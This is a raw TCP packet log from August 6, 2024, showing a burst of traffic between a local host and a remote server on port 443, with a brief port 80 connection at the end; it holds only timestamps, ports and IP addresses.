                          Aug 6, 2024 14:49:00.047589064 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.047646999 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.047655106 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.047693968 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.048028946 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.048042059 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.048099995 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.048105955 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.048142910 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.048530102 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.048542976 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.048599005 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.048604965 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.048645973 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.049348116 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.049361944 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.049420118 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.049426079 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.049463034 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.088711023 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.088725090 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.088901043 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.088907957 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.088948965 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.089270115 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.089282990 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.089332104 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.089338064 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.089376926 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.123697996 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.123720884 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.123893976 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.123903036 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.123949051 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.125102997 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.125118017 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.125180006 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.125185966 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.125226974 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.134624004 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.134644032 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.134706974 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.134713888 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.134855986 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.135216951 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.135231018 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.135286093 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.135291100 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.135329962 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.136010885 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.136024952 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.136087894 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.136092901 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.136132956 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.136789083 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.136805058 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.136862040 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.136871099 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.136908054 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.175718069 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.175755024 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.175944090 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.175944090 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.175956964 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.176000118 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.176163912 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.176187038 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.176219940 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.176225901 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.176253080 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.176270962 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.210494041 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.210509062 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.210618973 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.210627079 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.210668087 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.211939096 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.211966038 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.212270975 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.212282896 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.212340117 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.221532106 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.221544981 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.221616983 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.221631050 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.221682072 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.222273111 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.222287893 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.222349882 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.222368956 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.222517014 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.222536087 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.222544909 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.222557068 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.222589016 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.222609043 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.222634077 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.223434925 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.223448992 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.223496914 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.223515034 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.223536968 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.223558903 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.263506889 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.263525009 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.263628006 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.263658047 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.263720989 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.265196085 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.265212059 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.265291929 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.265305042 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.265353918 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.297511101 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.297524929 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.297621965 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.297636986 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.297689915 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.298785925 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.298820019 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.298866034 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.298880100 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.298908949 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.298928022 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.309945107 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.309961081 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.310029030 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.310035944 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.310074091 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.310674906 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.310688019 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.310759068 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.310765028 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.310801029 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.311135054 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.311146975 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.311192989 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.311198950 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.311234951 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.311805964 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.311816931 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.311853886 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.311858892 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.311887980 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.311907053 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.350455046 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.350478888 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.350594044 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.350606918 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.350657940 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.352046013 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.352061987 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.352147102 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.352153063 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.352194071 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.384763002 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.384793043 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.384949923 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.384958029 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.384998083 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.385648966 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.385664940 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.385742903 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.385749102 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.385788918 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.396737099 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.396750927 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.396814108 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.396821022 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.396850109 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.397435904 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.397449017 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.397515059 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.397521019 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.397562027 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.398329973 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.398345947 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.398407936 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.398413897 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.398451090 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.398859978 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.398874044 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.398926973 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.398935080 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.398978949 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.437108994 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.437135935 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.437402010 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.437477112 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.437639952 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.439131021 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.439152002 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.439234018 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.439248085 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.439301014 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.472342968 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.472368002 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.472605944 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.472671986 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.472752094 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.473443985 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.473459005 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.473536968 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.473551989 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.473611116 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.483845949 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.483869076 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.484011889 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.484026909 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.484081030 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.484605074 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.484620094 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.484678030 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.484690905 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.484718084 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.484736919 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.485338926 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485352993 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485420942 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.485431910 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485482931 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.485491991 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485502005 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485518932 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485548019 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.485572100 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.485640049 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.524091959 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.524122000 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.524199963 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.524199963 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.524251938 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.524296999 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.525821924 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.525846958 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.525909901 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.525916100 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.525957108 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.559098005 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.559125900 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.559217930 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.559246063 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.559304953 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.559870958 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.559894085 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.559932947 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.559938908 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.559971094 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.559986115 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.570605993 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.570630074 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.570708990 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.570715904 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.570760012 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.571789026 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.571805954 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.571881056 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.571887016 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.571926117 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.572453976 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.572467089 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.572530031 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.572540045 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.572596073 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.572887897 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.572902918 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.572942972 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.572952032 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.572993040 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.574928999 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.610980988 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.611008883 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.611210108 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.611219883 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.611265898 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.613023996 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.613055944 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.613101959 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.613106966 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.613146067 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.613163948 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.645852089 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.645875931 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.645979881 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.645996094 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.646047115 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.646433115 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.646447897 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.646528006 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.646536112 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.646578074 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.657311916 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.657330990 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.657450914 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.657479048 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.657535076 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.659655094 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.659668922 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.659825087 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.659843922 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.659900904 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.660762072 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.660774946 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.660864115 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.660877943 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.660928011 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.661432981 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.661448002 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.661520958 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.661533117 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.661577940 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.698381901 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.698409081 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.698600054 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.698661089 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.698731899 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.700155973 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.700170994 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.700264931 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.700284958 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.700330973 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.732892990 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.732917070 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.733045101 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.733068943 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.733112097 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.733591080 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.733617067 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.733686924 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.733692884 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.733741045 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.744143009 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.744163990 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.744250059 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.744256973 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.744301081 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.746681929 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.746696949 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.746762991 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.746790886 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.746850014 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.747828007 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.747843981 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.747854948 CEST49754443192.168.2.4185.149.100.242
                          Aug 6, 2024 14:49:00.747859955 CEST44349754185.149.100.242192.168.2.4
                          Aug 6, 2024 14:49:00.831887960 CEST4975580192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:00.836911917 CEST804975558.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:00.836990118 CEST4975580192.168.2.458.151.148.90
